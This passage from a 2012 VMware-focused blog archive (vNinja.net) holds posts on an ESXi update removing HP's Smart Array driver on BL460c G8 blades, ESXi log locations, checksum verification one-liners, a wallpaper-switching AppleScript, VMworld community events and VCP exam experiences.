was practically impossible to finish the labs in the timeframes given, but we did get to play around a bit! Thank you VMware Norway in general, and Stein in particular, for making this a reality. I look forward to the upcoming events! The VIP VCP 2012 Smurfs Group Shot (c) 2012 Stein Wilhelmsen --- # Why Did the HP BL460c G8 Lose It's Datastore? URL: https://vNinja.net/vmware-2/hp-bl460c-g8-lose-its-datastore/ Date: 2012-10-29 Author: christian Tags: BL460c, c3000, c7000, ESXi, G8, HP, P220i, Patch, ProLiant, Update, VMware Post Update: As per Preetam´s comment, HP has published a customer advisory regarding the usage of install vs update. After installing a couple of brand new HP ProLiant BL460c G8 blades with HP Smart Array P220i controllers at a customer site, I decided that I should upgrade from the VMware-ESXi-5.0.0-Update1-623860-HP-5.20.43.iso Build 623860 used to install the blades, to the latest 821926 build offered by VMware. Normally this is a really easy process using VMware Update Manager, but since this is a new installation all the prerequisites for that are not in place just yet and I decided to use esxcli to perform the update. After placing the downloaded ESXi500-201209001.zip VIB file on the local datastore on the first host, I ran the update with the following command: (abbreviated for legibility) ~ # esxcli software vib install -d /vmfs/volumes/datastore1/ESXi500-201209001.zip Installation Result Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective. Reboot Required: true VIBs Installed: [...] VIBs Removed: [...] ~ # So far so good! One quick, as quick as a HP blade can, reboot later my host was updated to ESXi 5.0.0 Build 821926 and everything looked fine. That is, until I wanted to put some new files into the blades local storage. Much to my surprise, there was no local storage to be seen at all. Thinking that something must have gone wrong while booting, I decided to try a new restart and imagine my surprise when the blade booted up again, but this time with Build 623860. Thinking that I must have messed things up pretty badly, I decided to try the same procedure on the second HP ProLiant BL460c G8 blade installed in the same manner. And yet again, I got the same results. While this is somewhat comforting when contemplating Albert Einstein´s definition of insanity, it´s not comforting when it comes to the procedure I followed for updating the hosts. This time around I recorded the output the esxcli command gave me, and found this little gem hidden inside the output:(unrelated VIBs removed) ~ # esxcli software vib install -d /vmfs/volumes/esx5local/ESXi500-201209001.zip Installation Result Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective. Reboot Required: true VIBs Installed: [...], VMware_bootbank_scsi-hpsa_5.0.0-17vmw.500.0.0.469512, [...] VIBs Removed: [...], Hewlett-Packard_bootbank_scsi-hpsa_5.0.0-28OEM.500.0.0.472560, [...] ~ # So, in short the update from VMware removes the HP Bootbank VIB for local SCSI controllers, and replaces it with a VMware one. Effectively this removes the ESXi hosts ability to read the local datastore from the HP Smart Array P220i Controller. What still baffles me though, is that the first boot after applying the update boots Build 821926, but subsequent boots are on Build 623860… In the end, to rectify the issue, I found the scsi-hpsa-5.0.0-28OEM.500.0.0.472560.x86_64.vib file on hp.com, downloaded it and placed it on the host. I then ran the update again ~ # esxcli software vib install -d /vmfs/volumes/datastore1/ESXi500-201209001.zip Installation Result Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective. Reboot Required: true VIBs Installed: [...] ~ # After installing the update, I then installed the HP ProLiant Smart Array Controller Driver ~ # esxcli software vib install -v file:/tmp/scsi-hpsa-5.0.0-28OEM.500.0.0.472560.x86_64.vib Installation Result Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective. Reboot Required: true VIBs Installed: Hewlett-Packard_bootbank_scsi-hpsa_5.0.0-28OEM.500.0.0.472560 VIBs Removed: VMware_bootbank_scsi-hpsa_5.0.0-17vmw.500.0.0.469512 VIBs Skipped: ~ # This reverses the removal of the Hewlett-Packard_bootbank_scsi-hpsa_5.0.0-28OEM.500.0.0.472560 VIB by the VMware Update itself. Another (quick) reboot, and finally my host was upgraded to the correct build and the local datastore was available too. ~ # cat /proc/driver/hpsa/hpsa0 hpsa0: HP Smart Array P220i Controller Board ID: 0x3355103c Firmware Version: 3.04 Driver Version: HP HPSA Driver (v 5.0.0-28OEM) Driver Build: 2 IRQ: 217 Logical drives: 1 Current Q depth: 0 Current # commands on controller: 0 Max Q depth since init: 0 Max # commands on controller since init: 4 Max SG entries since init: 129 Max Commands supported: 1020 SCSI host number: 0 hpsa0/C0:B0:T0:L1 Direct-Access LOGICAL VOLUME 3.04 RAID 1(1+0) ~ # Thankfully these blades had not yet been put into production, and I was free to wrestle with them as much as I wanted to make this work, without it affecting anything other than my troubleshooting genes. I have not tested if the same scenario unfolds if the hosts are updated via VMware Update Manager, but I suspect that the results would have been the same. Of course, the hosts could have been installed with the newer HP ESXi 5.0 U1 Sept 2012 refresh in the first place, and I probably would not have run into this issue, at least not until someone decided to apply a later patch to the host. All in all, I guess the lesson here is that you need to be careful when updating your hosts and make sure you have a real retreat option ready if you need to quickly roll back to the previous build. The luxury of having the time and possibility to really troubleshoot the issue, might not be available to you if you are upgrading production systems. Test your updates, every time. --- # Want Access to the VMworld 2012 Sessions? URL: https://vNinja.net/vmware-2/access-vmworld-2012-sessions/ Date: 2012-10-27 Author: christian Tags: Competition, fun, vmworld Fellow vExpert Rick Scherer is giving away a voucher that provides free access to all of the VMworld 2012 sessions, including associated MP3′s and PDF’s. Have a look at his post Win Access to VMworld 2012 Sessions and enter to win now! Good stuff Rick, real good! Update October 30th: Fresh VCDX and fellow vExpert Joep Piscaer has followed suit and announced his own “Want to win a VMworld 2012 Subscription?” contest. Now you have two chances to win access! --- # vShield Endpoint Entitlement, not just for vSphere 5.1 URL: https://vNinja.net/vmware-2/vshield-endpoint-entitlement-vsphere-5-1/ Date: 2012-10-05 Author: christian Tags: Licensing, VMware, vShield, vShield Edge, vSphere When VMware vSphere 5.1 and vCloud Networking and Security 5.1 was launched at VMworld US in late August, one of the news items was the change in licensing relating to vShield Endpoint. vShield Endpoint is now included in every vSphere edition, with the exception of the lowest tier vSphere Essentials package. I was under the impression that you had to upgrade to the new 5.1 version to take advantage of the licensing change, and get licenses available for vShield Endpoint, but a new VMware Knowledgebase article named KB: 2036875 Downloading and enabling vShield Endpoint on supported vSphere platforms debunks that. The licensing change makes vShield Edge available for all customers, with an active SnS, running vSphere 5.1.x, vSphere 5.0.x, or vSphere 4.1 U3! --- # Getting It Right: VMware Training and Certification URL: https://vNinja.net/vmware-2/right-vmware-training-certification/ Date: 2012-10-01 Author: christian Tags: Certification, labs, Training, VMware Everyone, and probably their extended family including their mother-in-law, has heard me whine and complain about the VCP training requirements. VMware has unveiled a new lab, namely Project Nee (Next-Generation Education Environment) and this is something I´m really excited about. Project Nee is described as this: VMware Project NEE is a new VMware Labs project providing a richly featured, powerful online learning and lab environment delivered from the cloud to any device, anywhere, anytime. There aren´t many details available at the moment, except that this seems to be exactly what I have looked for from VMware; Online access to a virtual lab environment, where you can access training resources in a flexible manner. Self paced online training, without the need to spend days on end in a classroom. In fact, the site specifically mentions “VMware vSphere: Install, Configure, Manage” training as being specifically beta tested at the moment. There is no information on pricing and availability just yet, but with VMworld Europe only a week away I would not be surprised if something is to be announced in Barcelona. With the VMware Hands-On Labs going public some time soon, and now Project Nee, VMware is certainly heading in the right direction as far as lab access and training is concerned. Dogfooding; you gotta love it! --- # VMware ESXi 4 vs ESXi 5 Log File Locations URL: https://vNinja.net/virtualization/vmware-esxi-4-vs-esxi-5-log-file-locations/ Date: 2012-09-17 Author: christian Tags: ESXi, ESXi 4, ESXi 5, Log Files, Ops, VMware, vSphere This post is inspired by a tweet from Andrew Storrs, where he pinpoints that the host log file locations have changed between ESXi 4 and ESXi 5. Note: This post has been updated with new log files for ESXi 5.1 ESXi 4 Log File Locations # [table id=6 /] ESXi 5 Log File Locations: # [table id=5 /] Between version 5.0 and 5.1 the log file locations have not changed, but a couple of new logs have been added. ESXi 5.1 New Log File Locations: # [table id=10 /] Clearly the number of host log file has increased in newer versions, and that should make it much easier to find the log entries you are looking for. A more granular logging into different specialized log files can only be a good thing. Logs from vCenter Server Components on ESXi 5.1: # [table id=11 /] Just remember that ESXi only logs to memory, and that you need to set logging to a syslog server to preserve logs between reboots. If ESXi 5 is installed on local disk, the log files will be persistent through reboots, since it creates a zipped archive in /var/run/log. If ESXi is deployed via Auto Deploy, no local disk is used and the log files are not persistent, and needs to be collected by an external syslog service. For more details about various VMware products and their log file locations, check VMware Knowledgebase article 1021806 and VMware Knowledgebase article 2032076 --- # Verifying VMware Downloads URL: https://vNinja.net/vmware-2/verifying-vmware-downloads/ Date: 2012-09-11 Author: christian Tags: Bash, Download, Integrity, MD5, OS X, SHA1, Terminal, VMware, vSphere Now that vSphere 5.1 and assorted products have been released into the wild, how do you check the integrity of your downloaded file? As you might be aware of, VMware publishes both MD5 and SHA1 hashes for their files, making it possible to check if the file you just downloaded is identical to the file offered from VMware. Checking the MD5 or SHA1 hash for a single file is easy, at least in OS X where you don´t need any third party tools to check. Open up Terminal and navigate to your download directory and run either the md5 command, or the shasum command to verify the file signature. You can then compare the signature to the checksums provided by VMware on the download page. For a single file, this is not a problem, but what if you have downloaded a bunch of files into a directory and want to calculate the checksums for all of them in one go? Thankfully this is pretty simple as well, just add a little Terminal (It´s really bash, I know) magic and you´re all set: MD5: find . -type f -exec md5 '{}' \; SHA1: find . -type f -exec shasum '{}' \; These small bash one-liners will go through all the files in the current directory, and calculate checksums for each of them. There are tools available for Windows as well that perform the same operations, but I haven´t looked into those for this post. A collection of MD5/SHA1 checksums for the vSphere 5.1 Release: # [table id=9 /] As far as I can tell, VMware does not offer a single page that lists all of the checksums for their files, something that makes finding the checksums a bit tedious. I´ve found that the best way to find then, after you have downloaded the files, is to check the My VMware Downloads History, page since it shows you all the downloads you have performed on one page, instead of going through multiple pages. Find the “Show Checksums” link to show the checksums, without having to open the download page for each item. Wishlist # I´m sure some scripting Wizkid could easily create a script that runs the checksum generation and then checks a given text file for a match, but I really wish VMware would create a service that enables you to easily check the checksums for a given file, without having to log on to VMware.com at all. If we could do a simple HTML request to a service that returns the checksum for a given file, that would easily be scriptable and comparisons could be performed automatically. That way, doing a request like this (yes, this is indeed a fake non-working URL): curl vmware.com/integrity/md5/vCO_VA-5.1.0.0-817595_OVF10.cert would return a simple c636547afb4de258d9164a74ac622674 Good idea? Bad Idea? Let me know! --- # ... and All I Asked for Was a Pin URL: https://vNinja.net/virtualization/all-i-asked-for-was-a-pin/ Date: 2012-09-11 Author: christian Tags: Care Package, fun, Pins, Stickers, VMware, vmworld Way back in the old days, you know when VMworld 2012 was held in San Francisco, I tweeted that if someone could get hold of a VCP pin for me, I would be very happy. Luckily Paul Valentino from vCommunity Trust picked that up, and apparently went on quite the scavenger hunt on my behalf. Imagine my surprise today when this little square meter of carton appeared, courtesy of Mr. Valentino: For some reason I suspected that Paul had not only shipped me a VCP pin and that there might be a couple of other things in the package as well. Indeed, a VMworld 2012 Backpack filled with various items, like the VMware vSphere 5.1 Clustering Deepdive book, the NetApp Data ONTAP Edge VSA, and a VMware Workstation 9 license key amongst other things (stickers, pins and a t-shirt). Thanks a lot Paul, your VMworld Marshall Plan is very, very much appreciated! --- # The Personal Value of Certification URL: https://vNinja.net/rant/personal-certification/ Date: 2012-09-01 Author: christian Tags: Certification, Rant Fabio Rapposelli´s post “On the Real Value of IT certifications” highlights some of the current problems related to IT certifications in general, and basic “entry level” exams in particular. The problems with brain dumps, lack of experience and testing methods is not new, and the “Paper MCSE” term was coined back in the early 2000´s when the influx of newly certified Microsoft Certified Systems Engineers, with little or no real world experience flooded the market. Sure, they were certified, but without hands-on experience, what is a certification worth? All in all, there is nothing new under the sun. As long as monetary or other professional rewards are in the picture, some people will do whatever it takes to achieve it. There is nothing new under the sun, the emperor is still not wearing any pants, and even if we don´t like to admit it, the desire to be or become better is human nature and for some people, this means stealing, lying and cheating. As Fabio mentions, replacing multiple-choice exams with hands-on lab based scenario ones is probably the best way to go, even for the “entry level” exams. I’ve mentioned this before, VCP 5 Certification Requirements Clarification, but removing mandatory training classes might also be a way to lower the cost of obtaining a certification. This in turn might provide less incentive to actually study brain dumps, since the “cost of failure” won´t be as high. And yes, the moon just might be made of cheese. On my part, certifications play a dual-role. For one, it´s a way for me personally to validate my skill set, and gives me tangible goals to work towards. Secondly, I work for a VAR that has competency requirements from their partners, and I work to fulfill those. That dual focus helps me keep my integrity, but if my only goal was to fulfill some partners (paper) competency requirements the story might just be different. What do you think? Do most people pursue certifications for personal fulfillment, or has certification lost it´s luster and generally not worth anything? --- # Shanghai... we have a problem... URL: https://vNinja.net/virtualization/shanghai-problem/ Date: 2012-08-20 Author: Tags: Disaster, Fire, Virtualization My Saturday morning started the same as any other. I checked my emails and my tweets, started a coffee, walked my dog and got into the shower. My iPhone buzzing on the sink caught my attention a few minutes into it. Covered in soap and the rest censored for the public here I answered the call. Without getting into too many details of my organization - my bosses-bossess-boss contacted me reporting a fire in one of our server rooms in Shanghai China. Trying not to panic I got it together and agreed to meet and discuss ASAP. For privacy reasons lets cut to Monday. I drove to the Chinese Embassy that morning here in Zuerich and begged for a Visa as my plane was leaving at 19:00 that evening. They laughed initially since normally processing time is 7 days. When they noticed the seriousness of the situation they told me to return in 1 hour and I would be granted a 1 year Visa. Cut to Monday night - I flew from Zuerich to Charles De Gaulle in Paris had a few problems and ran across the entire airport but in the end made my flight. This is normal for changing planes in Paris :). After I got on the plane I shut myself down and forced myself to sleep because I knew I would have a big job on my plate when I arrived. I managed to get 4-6 hours of restless sleep and landed in Shanghai in the afternoon. I called the office and let them know about my arrival, they sent a car and the fun began. When I arrived in the office I found 10 seriously charred physical servers**. Some with cut off melted power plugs and ethernet cables still in them. I quickly asked them to place stickers on the servers that were priority and explain to me what exactly is the most important application/server to recover first. Again without getting into to much - our backups there were “no longer available” I managed to get a critical DB running again by copying the RAID config to disk right before it crashed again, switched the disks over to a loaner server and wrote the RAID config to the controller and quickly began a P2V to a new server I was provided that I installed vSphere 5 on when I arrived. This was only 1 of the many Hail Marys I was able to complete this week. In the end of the week - 72 hours of work later, talking thru translators and a brief departure for some rest I was able to recover all but the oldest server. I turned 10 physical servers into 2 vSphere 5 hosts with local storage, Better than nothing and flexible enough to change it later as needed. The moral of this story is in the face of disaster one of the best tools you have in your belt is Virtualization. You have flexibility that normally is not possible and can add more resources later as needed with minimal pain. I know this goes back to basics but sometimes we need to go back to basics to really refresh our thoughts on the technology. --- # VMware launches Public vCloud "Test-Drive" URL: https://vNinja.net/news/vmware-launches-public-vcloud-test-driv/ Date: 2012-08-16 Author: christian Tags: Cloud, News, Opinion, vCloud, VMware VMware Offers vCloud “Test-Drive” with New Evaluation Service. This announcement doesn´t seem to be “Project Zephyr” which, if the rumors are true, is VMware´s own fully fledged IaaS service. This Public vCloud “Test-Drive” service, which VMware themselves describe as “white-label” from a vCloud service provider, seems like a way for VMware to provide cheap test-drive access, to vCloud through their existing service providers. Where the rumored “Project Zephyr” might be seen as a competing service, Public vCloud looks to be engineered to drive long term customers to the existing ecosystem of providers. I see this as a great move by VMware, that they actually put their name, expertise and marketing powers behind a test-drive setup, with a unified pricing scheme, that should drive customers towards existing providers. The need for this evaluative service is pretty clear to me, unlike other cloud providers, you can actually move workloads to a vCloud from your own private cloud setup using vCloud Connector. For customers invested in VMware products to power their private clouds, this should be very interesting, and in many cases might just be what is needed for a lot of potential clients to dip their does into the vCloud Ecosystem. For now, it looks like Public vCloud only offers Linux as operating system, something that might be a limiting factors for many customers, but I´m sure that will change down the line. Like it or not, I still think that for something like vCloud to be really interesting to most, at least small to medium, enterprises, Windows Server needs to be an option. Update: According to Try Your Own vCloud in Minutes: To get you started quickly, vCloud Service Evaluation offers a variety of pre-built content templates (at no charge) including Wordpress, Joomla!, Sugar CRM, LAMP stack, Windows Server and a mix of web and application stacks and OSes. You can also Bring Your Own VM (BYOVM). That’s right, you can BYOVM and put it into your own private catalog for deployment. You can do that either by uploading it directly into vCloud Director, or you can run the vCloud Connector VMs into your account (they’re in the public catalog) and use that to transfer your VMs from vSphere or any other vCloud. So, Windows Server VMs are indeed included, and supported right off the bat. As a proof of concept, and a way for VMware to show that they are both dogfooding (something I´m sure Paul Maritz will enjoy as he departs from VMware), and investing in their service provider ecosystem, this seems like a good move that might accelerate deployments, or at least let those curious have a look at a working setup. But then again, what do I know. [IANAA]: I am not an analyst --- # Building End-User Computing Solutions with VMware View Book Available URL: https://vNinja.net/virtualization/building-end-user-computing-solutions-vmware-view-book/ Date: 2012-08-03 Author: christian Tags: Book, EUC, Horizon, ThinApp, View, Virtualization, VMware, VMware View Mike Laverick and Barry Coombs has released their new book, elegantly titled “Building End-User Computing Solutions with VMware View”. Not only is this a great book, it is something that every existing and potential VMware View (and related technologies in the EUC area) administrator should add to their (digital) bookshelves. I´ll let the authors themselves describe it: This book is all about VMware View 5.1 and ThinApp 4.7.2 administration - and it takes in a wide scope of complementary technologies from the likes of Teradici, BitDefender and F5 Networks. Towards the end the focus switches away from virtual desktops to look at the future of end-user computing including VMware’s ThinApp Factory and Horizon Appliction Manager. This book is a not for profit venture. The monies raised by the sale of the book will be donated in full to the work of UNICEF. UNICEF carries out work across the globe that benefits all children regardless of their social, ethnic, religious or geographical location. It’s our sincere hope that people will use the legitimate sources for acquiring this book – and by doing so support the work of UNICEF. Writing the foreword for a book like this has been a secret personal goal of mine for quite some time, so when I was approached by Mike about writing it I immediately jumped on the opportunity. I´m truly honored to have a small part in this non-profit project, and I hope that in the end it will generate a sizable contribution to the great work done by UNICEF. Order your copy today! --- # Applescript, Desktop Wallpaper and Growl. Automagically. URL: https://vNinja.net/osx/applescript-desktop-wallpaper-growl-automatically/ Date: 2012-07-24 Author: christian Tags: Applescript, automation, fun, Mac, OS X, Scripting I´ve been a Mac and OS X user now for about 7 months, but to be honest I have not been very experimental in my usage of my Macbook Air. Until now, my main focus has been basic usage of the hardware and operating systems, and making it work in my corporate environment. As I feel that I´ve reached mission accomplished status on that initial project, I decided to use some of my “free” vacation time to play around a bit and experiment a bit more. For some reason, I decided to start to play around a bit with Applescript and try to create something that changes my desktop wallpaper based on a “Home” and a “Work” scenario. Initially I made a quick script, my first ever Applescript, that presented a dialog box asking me if “Home” or “Work” was the current status, and then changed the desktop wallpaper accordingly. I then assigned that to a hotkey, so I could quickly change between the two modes. That solution left me with two things; One, it worked! and Two, it could be done better by adding some automation to it. Here is the solution I ended up with: # Populate ipaddr variable with IP address set ipaddr to do shell script "ifconfig | awk '/broadcast/ {print $2}' | tail -1" # Check if connection is home connection, based on IP subnet # If not connected, set ipaddr variable to 0.0.0.0 to avoid empty variable issues # Dirty hack to add padding to zero values, but hey, it works for me. if (ipaddr is "") then set ipaddr to "000.000.0.0" end if set ipaddrtxt to (characters 1 thru 9 of ipaddr) as string if ipaddrtxt is "192.168.5" then # Change this to your own subnet set situation to "Home" else set situation to "Work" end if # Get current desktop image path tell application "System Events" tell current desktop set currentDesktop to (get picture as text) end tell end tell # Build the desktop image path set desktopPath to "Macintosh HD:Users::Dropbox:switcher:" & situation & ".png" # Change this to your own paths # Only tell Finder to change the desktop and notify Growl if a change is required (eg. desktop path not equal to current path) if currentDesktop is not desktopPath then # Tell Finder to change the desktop tell application "Finder" set desktop picture to {desktopPath} as alias end tell tell application "GrowlHelperApp" set the allNotificationsList to {"Wallpaper Change"} set the enabledNotificationsList to {"Wallpaper Change"} register as application "Wallpaper Change" all notifications allNotificationsList default notifications enabledNotificationsList icon of application "Script Editor" -- Send a Notification... notify with name "Wallpaper Change" title "Wallpaper Change" description "Wallpaper changed to " & (situation) application name "Wallpaper Change" end tell end if I know my theme isn´t very suited for code pastes, so the whole applescript source code is also available for download. After the script was finished, I added it to my Geektools bash script, that refreshes at a fairly frequent interval: # Run Background Switcher Applescript osascript /Applescript/Switcher.scpt Sure, I could have used a crontab instead, but for me the easiest way to get this working quickly was to add it to the existing setup I had in place. Demo time! # The Applescript detects if the computers IP address is on a given subnet, and if so it sets the wallpaper specified for that subnet, dubbed “Home”. If it determines that it is not on that particular subnet, it´s officially at “Work” and sets the wallpaper accordingly. That´s all the logic there is too it, and I´m sure that can be improved either by me or more likely someone who has been hit by the Applescript clue bat. My desktop Wallpaper images are stored in a given folder in my Dropbox, with one of them called Home and the other called Work. This limits the script to those two given file names, and switches between the two accordingly. It also assumes the the files are on the PNG format. An added bonus by storing the files in Dropbox is that I can remotely change out the image, and keep the wallpapers synchronized between several computes if I wish to do so. Note that I am under no circumstances a developer and that this is my first Applescript. I am sure there are much better ways to accomplish the same things, with better error handling and overall better code quality, but the fact is that this works for me and I´m happy with it. --- # 10 minute lightning Tech Talk at VMworld? URL: https://vNinja.net/vmware-2/techtalks-at-vmworld2012/ Date: 2012-07-22 Author: christian Tags: Community, Flash Talk, VMware, VMWorld 2012 I love it when a plan comes together, especially when someone gets an idea and then someone fires on all cylinders and executes! As mentioned before, there has been a lot of talk about various ways to create a “soapbox” for all those who submitted VMworld sessions and got rejected, or those who did not submit but would still like to present. Thankfully the guys behind vBrownBags has teamed up with VMware communities and are now offering this opportunity at VMworld 2012. I am not sure if this also extends to VMworld Europe, but it is happing in the US event at least. To read all the details, including sign up details check TechTalks powered by vBrownBags - Coming to VMworld --- # vSphere 5: Creating a Hardware Version 4 VM URL: https://vNinja.net/virtualization/vsphere-5-creating-hardware-version-4-vm/ Date: 2012-07-02 Author: christian Tags: EasyVNX, ESX, ESX 3.5, ESXi, Hardware Version, VMware, vSphere, workaround I recently had a need to create a VM for usage on ESX 3.x, but the only thing available to me in my lab was vSphere 5, which naturally creates new VMs with the latest and greatest version 8 virtual hardware. The following table lists the virtual hardware versions and the corresponding ESX and ESXi releases: Version Virtual Hardware Version ESXi 5.x 8 ESX/ESXi 4.x 7 ESX 3.x 4 ESX 2.x 3 Naturally, an ESXi 5.x host can run VMs created with older hardware versions but it is not possible (through the vSphere Client) to create a new VM with an old hardware version, and I needed to create a v4 VM for later export to an ESX 3.x host. Of course, I could have created the VM on the ESX host that it was supposed to run on on the first place, but the host in question was unavailable at the time and the plam was to prepare the VM off site before deployment in the production environment. Since I did not have a valid license for ESX 3.5 any more, the easiest way I found to create a hardware version 4 VM, and configure it on vSphere 5, was to use Easy VMX to create the basic VM (vmx file) instead of hacking away at creating it manually. Easy VMX created the .VMX file that I needed to register a hardware version 4 VM to a ESXi 5.x host, and edit it through the vCenter client. Of course, it creates disk files that are incompatible with ESX but that´s of no concern as you can just remove the invalid devices and add new ones through the vCenter client. All in all this little “trick” worked without a hitch, and the small Linux machine I had set up for the client worked perfectly when deployed on the old ESX 3.5 install. Of course, the best option would be to reinstall the old ESX 3.5 host with ESXi 5, but as this was a system due to be decommissioned very soon that was not a real option for the client. The main purpose of the VM I created was to act as an alerting system for incoming email, warning that the email addresses had changed to a new domain, and emails sent to the old one would not be read or acted upon. --- # VMworld Session Reject Club URL: https://vNinja.net/virtualization/vmworld-session-reject-club/ Date: 2012-06-27 Author: christian Tags: Collaboration, Community, UnConference, VMware, vmworld, VMworld2012 **VMworld Session Reject Club 1st RULE: You do talk about Reject Club. ** Today VMware has sent out notifications to VMworld 2012 session submitters, with a yay or nay email. Of course, this sparked a lot of conversation on Twitter, and Scott Lowe published a blog post proposing a VMworld Unconference, and exploring several options: A physical “unconference” A virtual “unconference” A series of 10-minute “flash talks” at VMworld 2012 In essence I agree with Scott, a combo of #2 and #3 would be great. #2 for people not attending VMworld, #3 for people attending, if VMware allows it. I remember discussing this same topic with Mike Laverick during Tech Field Day #6 in Boston last year, and I´m glad to see several other people discussing the possibility of doing something along the lines of #2. I really love seeing #3 being something that might actually happen, considering it´s something we discussed with Hal Rottenberg in vSoup #23: Better Late Than Never. The idea wash´t just the flash talk, but also to get them recorded on VMware TV, and streamed live. That adds some additional merit to it, even if it´s only a 10 minute session. Hopefully there will be enough interest in this, to actually make it happen. After all, the virtualization community lives and breathes content and idea sharing, this is just an extension of it. Option #1 seems like a lot of effort, and might be very costly unless someone offers to sponsor the event itself, and even if that´s a possibility getting people to physically attend such a conference might prove very difficult. A physical un-conference might be a good idea for those traveling regardless if their session was accepted or not, but for those unfortunate enough that their VMworld attendance was hinging on session approval, attending such an event seems improbable. People are already having trouble convincing their management that attending VMworld is worth the cost, imagine trying to convince them that you need to go to a un-conference for “the rejects”? Don´t get me wrong, I understand that there has to be a lot of rejected sessions and only a selected few gets selected. I believe that is fair, and my intention is not to criticize VMware for it. If anything, looking at the list of “rejects” it speaks volumes about the sessions that was indeed selected. My congratulations goes out to everyone who got through the eye of the needle, and at the same time it´s very interesting to see that people who submitted rejected sessions still plan on making the most of it. Obviously there is a lot of good ideas out there, waiting to get exposed to the world. Of course, a #v0dgeball game between those who got rejected and those who got accepted is a [great idea](gminks: Maybe there needs to be a #v0dgeball team of rejected vmworld proposals vs accepted proposals) too! --- # Thinapped vSphere Client Updated to V5.0 URL: https://vNinja.net/vmware-2/thinapped-vsphere-client-updated-v5-0/ Date: 2012-05-31 Author: christian Tags: Free Tools, fun, realworld, ThinApp, VMware, vSphere The Thinapped vSphere Client has finally been updated to v5.0, and is readily available for download! Sadly the new version is v5.0 only, and will only allow you to connect to vSphere v5 hosts and since the new release has replaced the old release on the VMware Fling website, you´re out of luck if you haven´t already got the 4.0 version stowed away in your own private locker. I hope VMware decides to either make the 4.0 version available for download as well, even if 5.0 is the current release, or at least that they create a new download package for 5.0 that also includes the 4.0 and 4.1 versions. I know this is a fling, and that it´s _unsupporte_d by nature, I really think that this is a good idea, that is if it´s kept current with the vSphere release cycles. If that´s not possible, it should be removed and administrators should be instructed on how to create their own “ThinApped” version. After all, it´s really not that hard to do. --- # VMware Forum 2012 Oslo URL: https://vNinja.net/virtualization/vmware-forum-2012-oslo/ Date: 2012-04-26 Author: christian Tags: conference, event, Oslo, Travel, VMware, VMware Forum Just like last year, I got up really early and caught a 06:40 am flight from Bergen to Oslo to attend the VMware Forum. A couple of things have changed since the last time, one of them being the venue. This time around it was held at Ullevaal Business Class, and the venue itself worked great for a one day conference like this, divided into three sections, two for parallel sessions and one for the exhibitor area. One of the other changes from last year, is that I now work for a VMware Partner, who was also a Platinum Sponsor of the event. This was my first event working for a partner, and I even had booth duty! Talking with customers in a partner setting is quite different from being a customer yourself, so that was interesting in an of itself. Sadly this also meant that I missed most of the sessions, but I did manage to catch the keynote by Brian Gammage, VMware´s Chief Market Technologist. I even got a “1-on-1” session with Mr. Gammage, accompanied with a couple of my colleagues from EVRY Consulting, which was really interesting to say the least. Listening to someone extremely knowledgeable and visionary, in a small non-speaking setting was an eye-opener with regards to how VMware sees the future of end user computing. Sadly I can´t go into details about it, but I´m confident that VMware has a strategy in the works that might just surprise more than a few people. Unfortunately this “1-on-1” session collided with both Joel Lindberg´s and Lee Dilworth´s sessions, so I didn´t catch any of those, which in reality was the two sessions I was looking most forward to beforehand. Also, what´s up with scheduling both those sessions against each other, that sounds like a bit of bad planning from the organizing committee. I did however get to meet both of them in the exhibition area, even if only ever so briefly. I also met up with both Vegard Sagbakken and Stein Willhelmsen from VMware, Mike Beevor from Whiptail and Linus Svensson from Veeam. All in all I think VMworld Forum 2012 in Oslo was a step in the right direction compared to last year, but it´s still not a very technical event and I don’t´really think it is supposed to be. Perhaps my expectations for it last year were a bit high, and this year they might just have been a bit to low. Oh, I even spotted Cody Bunch´s Automating vSphere with VMware vCenter Orchestrator book in the wild! --- # VCDX Wannabe goes live URL: https://vNinja.net/virtualization/vcdx-wannabe-live/ Date: 2012-03-27 Author: christian Tags: Certification, VCDX, VCDXWannabe My little pet project VCDX Wannabe has now (finally) gone live. For now it´s mostly a collection of links and resources, but that will change over time. So, if you want to see me (and possibly a few others) either go down in flames, kicking and screaming, or succeed obtaining the VCDX certification you now have the opportunity to do so. --- # vCenter Client Download URLs URL: https://vNinja.net/vmware-2/vcenter-client-download-urls/ Date: 2012-03-12 Author: christian Tags: Download, featured, Self Help, vCenter Client, VMware, vSphere Since the vCenter Client no longer is bundled with an ESXi host installation, I´ve compiled a quick list of direct download URLs for the most recent clients. Update 17th September 2014: # VMware has published the official list in knowledge base article KB2089791, use that as the official list going forward. Remember, the client download URL is still available from the vCenter server, if you point your browser to it. Another way of getting hold of the client is from the vCenter ISO file downloadable from vmware.com. 10. September 2014: Table updated to include new version for 5.5 update 2 [table id=8 /] --- # My VCP 5 exam experience URL: https://vNinja.net/virtualization/vcp-5-exam-experience/ Date: 2012-02-29 Author: Tags: Like many others I was a VCP 4 and needed to upgrade to VCP 5 by Feb 29th to avoid a pricey class and possible ribbing from my peers. I was well aware of this deadline since mid December, however, I procrastinated on studying and was mostly flinging myself around the globe doing implementations and having an all around good time. When Feb 1st came I was sitting on a flight from Saigon to Frankfurt and that is when panic struck. I realized I had until the end of the month to finish the requirement. ‘I instantly pulled out my iPad and began frantically combing thru the VCP 5 Blueprint and reading countless documents over the 12+ hour flight. When I returned home that is when I really began to crack the books. When I was too tired to keep reading official vSphere Docs or playing in my lab Cody Bunch’s Professional VMware Brownbags were perfect to sit and listen and absorb some info. It was really helpful as they go thru each point of the specific objective of the day and also get some insight from some guests who had already taken the exam. Another great resource is Andrea Mauro’s vInfrastructure VCP 5 notes - there was tons of helpful information there. Also not to be forgotten is MW Preston’s VCP 5 resources. Finally, I would never study for a VCP exam without using the great practice exams available from Simon Long of the SLOG Blog. While there are many other great resources available there are too many to list here as this is an experience post. So after combing thru all these resources hours per night for a couple of weeks I finally booked my exam for Feb 28th. Then that is when the nerves really set in. I started to doubt if with 3 weeks of studying I had prepared enough or if I was going to be surprised with a lot of new content. So I pushed on and continued reading and possibly obsessing over particular objectives I was not 100% comfortable with until the days ran out. Test day I left work after lunch and drove to the test center. During check in I was a bit nervous and began having trouble speaking Swiss German to the testing center staff. I sat down and first took the survey which made me even more nervous knowing the test was coming soon. When the test began and I got thru the first 20 questions and my nerves began to lighten. I realized all the vSphere 5 implementations I did recently along with reading up on some of the new features was the ticket. Without getting to much into details as I am bound by NDA, this exam was more about knowing the product and working with it on a day to day basis rather than straight memorization. For the VCP 4 I remember spending countless hours memorizing Configuration Maximums and other things that promptly left my head after the test was completed. After all that is what the Configuration Maximum documents are for! In conclusion I think that for actual 